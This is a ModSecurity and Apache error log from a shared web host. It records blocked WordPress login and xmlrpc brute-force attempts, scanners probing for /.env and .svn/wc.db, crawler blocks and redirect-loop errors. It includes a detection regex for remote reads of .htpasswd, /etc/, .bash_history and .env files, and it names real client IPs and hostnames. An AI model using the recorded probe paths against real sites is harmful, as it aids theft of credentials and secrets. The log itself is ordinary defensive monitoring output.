[Tue May 26 14:38:27.485800 2026] [security2:error] [pid 626747:tid 626875] [remote 51.91.98.45:58440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVjCxVF8Qmdmw_OMfIDdAABf38"]
[Tue May 26 14:38:28.492109 2026] [security2:error] [pid 626747:tid 626985] [client 66.249.66.162:64757] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "greattusker.com"] [uri "/robots.txt"] [unique_id "ahVjDBVF8Qmdmw_OMfIDjAAAAXY"]
[Tue May 26 14:38:29.190830 2026] [security2:error] [pid 626747:tid 626892] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjDBVF8Qmdmw_OMfIDlgAAARk"]
[Tue May 26 14:38:29.985922 2026] [security2:error] [pid 626747:tid 626944] [client 202.141.83.254:53797] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjDRVF8Qmdmw_OMfIDrgAAAU0"]
[Tue May 26 14:38:29.986461 2026] [security2:error] [pid 626747:tid 626944] [client 202.141.83.254:53797] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjDRVF8Qmdmw_OMfIDrgAAAU0"]
[Tue May 26 14:38:31.137758 2026] [security2:error] [pid 626747:tid 626972] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjDhVF8Qmdmw_OMfIDwwAAAWk"]
[Tue May 26 14:38:32.223192 2026] [security2:error] [pid 626747:tid 626948] [client 176.65.139.231:34426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ivwellnessresources.org"] [uri "/.env"] [unique_id "ahVjEBVF8Qmdmw_OMfID6gAAAVE"]
[Tue May 26 14:38:33.151351 2026] [security2:error] [pid 626747:tid 626934] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjEBVF8Qmdmw_OMfID_QAAAUM"]
[Tue May 26 14:38:35.490161 2026] [security2:error] [pid 626747:tid 626957] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjExVF8Qmdmw_OMfIEOQAAAVo"]
[Tue May 26 14:38:35.979360 2026] [core:error] [pid 626747:tid 626929] [client 104.28.228.78:11148] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:35.979382 2026] [core:error] [pid 626747:tid 626929] [client 104.28.228.78:11148] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:36.670427 2026] [security2:error] [pid 626747:tid 626883] [client 195.178.110.34:49254] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVjFBVF8Qmdmw_OMfIEaAAAARA"]
[Tue May 26 14:38:36.831950 2026] [security2:error] [pid 626747:tid 626901] [client 195.178.110.34:49254] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/.svn/entries"] [unique_id "ahVjFBVF8Qmdmw_OMfIEcAAAASI"]
[Tue May 26 14:38:37.653214 2026] [autoindex:error] [pid 626747:tid 626935] [client 15.204.161.7:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:38:37.839693 2026] [core:error] [pid 626747:tid 626893] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:37.839713 2026] [core:error] [pid 626747:tid 626893] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:37.839829 2026] [security2:error] [pid 626747:tid 626893] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVjFRVF8Qmdmw_OMfIEjQAAARo"]
[Tue May 26 14:38:37.840353 2026] [security2:error] [pid 626747:tid 626896] [client 195.178.110.34:37874] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVjFRVF8Qmdmw_OMfIEiwAAAR0"]
[Tue May 26 14:38:37.860303 2026] [security2:error] [pid 626747:tid 626926] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjFRVF8Qmdmw_OMfIEgQAAATs"]
[Tue May 26 14:38:38.923847 2026] [security2:error] [pid 626747:tid 626899] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjFhVF8Qmdmw_OMfIEnQAAASA"]
[Tue May 26 14:38:39.885126 2026] [core:error] [pid 626747:tid 626879] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:39.885152 2026] [core:error] [pid 626747:tid 626879] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:39.885283 2026] [security2:error] [pid 626747:tid 626879] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVjFxVF8Qmdmw_OMfIEwwAAAQw"]
[Tue May 26 14:38:39.885825 2026] [security2:error] [pid 626747:tid 626943] [client 195.178.110.34:37876] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVjFxVF8Qmdmw_OMfIEwQAAAUw"]
[Tue May 26 14:38:40.567734 2026] [security2:error] [pid 626747:tid 626902] [client 202.141.83.254:53782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjGBVF8Qmdmw_OMfIEywAAASM"]
[Tue May 26 14:38:40.567860 2026] [security2:error] [pid 626747:tid 626902] [client 202.141.83.254:53782] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjGBVF8Qmdmw_OMfIEywAAASM"]
[Tue May 26 14:38:42.730337 2026] [core:error] [pid 626747:tid 626914] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:42.730355 2026] [core:error] [pid 626747:tid 626914] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:42.730465 2026] [security2:error] [pid 626747:tid 626914] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVjGhVF8Qmdmw_OMfIFDAAAAS8"]
[Tue May 26 14:38:42.730956 2026] [security2:error] [pid 626747:tid 626915] [client 195.178.110.34:37878] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVjGhVF8Qmdmw_OMfIFCAAAATA"]
[Tue May 26 14:38:43.589389 2026] [security2:error] [pid 626747:tid 627001] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjGxVF8Qmdmw_OMfIFEgAAAYY"]
[Tue May 26 14:38:45.531443 2026] [security2:error] [pid 626747:tid 626990] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjHRVF8Qmdmw_OMfIFMwAAAXs"]
[Tue May 26 14:38:45.950706 2026] [security2:error] [pid 626747:tid 626969] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjHRVF8Qmdmw_OMfIFPAAAAWY"]
[Tue May 26 14:38:47.948011 2026] [security2:error] [pid 626747:tid 626981] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjHxVF8Qmdmw_OMfIFdAAAAXI"]
[Tue May 26 14:38:47.958124 2026] [security2:error] [pid 626747:tid 626981] [client 195.178.110.34:48836] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVjHxVF8Qmdmw_OMfIFggAAAXI"]
[Tue May 26 14:38:49.334553 2026] [security2:error] [pid 626747:tid 626958] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjIBVF8Qmdmw_OMfIFpgAAAVs"]
[Tue May 26 14:38:50.769859 2026] [security2:error] [pid 626747:tid 626971] [client 202.141.83.254:53880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjIhVF8Qmdmw_OMfIF3AAAAWg"]
[Tue May 26 14:38:50.769996 2026] [security2:error] [pid 626747:tid 626971] [client 202.141.83.254:53880] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjIhVF8Qmdmw_OMfIF3AAAAWg"]
[Tue May 26 14:38:51.866180 2026] [security2:error] [pid 626747:tid 626893] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjIxVF8Qmdmw_OMfIF8AAAARo"]
[Tue May 26 14:38:53.912757 2026] [security2:error] [pid 626747:tid 626917] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjJRVF8Qmdmw_OMfIGPQAAATI"]
[Tue May 26 14:38:55.980791 2026] [security2:error] [pid 626747:tid 626940] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjJxVF8Qmdmw_OMfIGcwAAAUk"]
[Tue May 26 14:38:57.563192 2026] [security2:error] [pid 626747:tid 626894] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjKRVF8Qmdmw_OMfIGnAAAARs"]
[Tue May 26 14:38:57.962060 2026] [security2:error] [pid 626747:tid 626918] [client 47.198.156.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjKRVF8Qmdmw_OMfIGpQAAATM"]
[Tue May 26 14:38:59.687785 2026] [security2:error] [pid 626747:tid 626902] [client 154.161.32.97:46551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVjKxVF8Qmdmw_OMfIG2AAAASM"]
[Tue May 26 14:38:59.687953 2026] [security2:error] [pid 626747:tid 626902] [client 154.161.32.97:46551] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVjKxVF8Qmdmw_OMfIG2AAAASM"]
[Tue May 26 14:38:59.726125 2026] [security2:error] [pid 626747:tid 626964] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjKxVF8Qmdmw_OMfIG0AAAAWE"]
[Tue May 26 14:39:01.526832 2026] [security2:error] [pid 626747:tid 626933] [client 202.141.83.254:53866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjLRVF8Qmdmw_OMfIHCQAAAUI"]
[Tue May 26 14:39:01.527347 2026] [security2:error] [pid 626747:tid 626933] [client 202.141.83.254:53866] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjLRVF8Qmdmw_OMfIHCQAAAUI"]
[Tue May 26 14:39:02.242292 2026] [security2:error] [pid 626747:tid 626878] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjLRVF8Qmdmw_OMfIHEAAAAQs"]
[Tue May 26 14:39:04.274369 2026] [security2:error] [pid 626747:tid 626923] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjLxVF8Qmdmw_OMfIHRAAAATg"]
[Tue May 26 14:39:05.816366 2026] [security2:error] [pid 626747:tid 626974] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjMRVF8Qmdmw_OMfIHagAAAWs"]
[Tue May 26 14:39:08.387091 2026] [security2:error] [pid 626747:tid 626916] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjMxVF8Qmdmw_OMfIHxwAAATE"]
[Tue May 26 14:39:09.014872 2026] [security2:error] [pid 626747:tid 626883] [client 192.178.8.101:46744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVjNBVF8Qmdmw_OMfIH9QAAARA"]
[Tue May 26 14:39:10.372811 2026] [security2:error] [pid 626747:tid 626968] [client 192.186.133.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjNhVF8Qmdmw_OMfIIGgAAAWU"], referer: https://www.anujtradingco.com/
[Tue May 26 14:39:10.625497 2026] [security2:error] [pid 626747:tid 626954] [client 43.172.197.6:46232] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVjNBVF8Qmdmw_OMfIH2AAAAVc"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 14:39:11.400375 2026] [security2:error] [pid 626747:tid 626924] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjNhVF8Qmdmw_OMfIIKQAAATk"]
[Tue May 26 14:39:11.402633 2026] [security2:error] [pid 626747:tid 626984] [client 185.191.171.1:45490] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-23rd/list/"] [unique_id "ahVjNxVF8Qmdmw_OMfIIOAAAAXU"]
[Tue May 26 14:39:11.402775 2026] [security2:error] [pid 626747:tid 626984] [client 185.191.171.1:45490] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-23rd/list/"] [unique_id "ahVjNxVF8Qmdmw_OMfIIOAAAAXU"]
[Tue May 26 14:39:12.008712 2026] [security2:error] [pid 626747:tid 626978] [client 192.186.133.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjNxVF8Qmdmw_OMfIIQgAAAW8"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1280661&moderation-hash=635f273bee50743c651750021935dde8
[Tue May 26 14:39:12.126982 2026] [security2:error] [pid 626747:tid 626986] [client 202.141.83.254:5806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjNxVF8Qmdmw_OMfIIRAAAAXc"]
[Tue May 26 14:39:12.127127 2026] [security2:error] [pid 626747:tid 626986] [client 202.141.83.254:5806] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjNxVF8Qmdmw_OMfIIRAAAAXc"]
[Tue May 26 14:39:12.488083 2026] [security2:error] [pid 626747:tid 626888] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjOBVF8Qmdmw_OMfIITQAAARU"]
[Tue May 26 14:39:13.736330 2026] [security2:error] [pid 626747:tid 626847] [remote 14.161.17.36:46508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVjORVF8Qmdmw_OMfIIewABbmM"]
[Tue May 26 14:39:13.891126 2026] [security2:error] [pid 626747:tid 626936] [client 43.173.182.206:48850] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVjOBVF8Qmdmw_OMfIIUAAAAUU"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 14:39:14.324211 2026] [security2:error] [pid 626747:tid 626890] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjORVF8Qmdmw_OMfIIhQAAARc"]
[Tue May 26 14:39:14.493943 2026] [security2:error] [pid 626747:tid 626991] [client 43.172.195.237:49746] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVjOBVF8Qmdmw_OMfIIUQAAAXw"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 14:39:16.603415 2026] [security2:error] [pid 626747:tid 626932] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjPBVF8Qmdmw_OMfII2gAAAUE"]
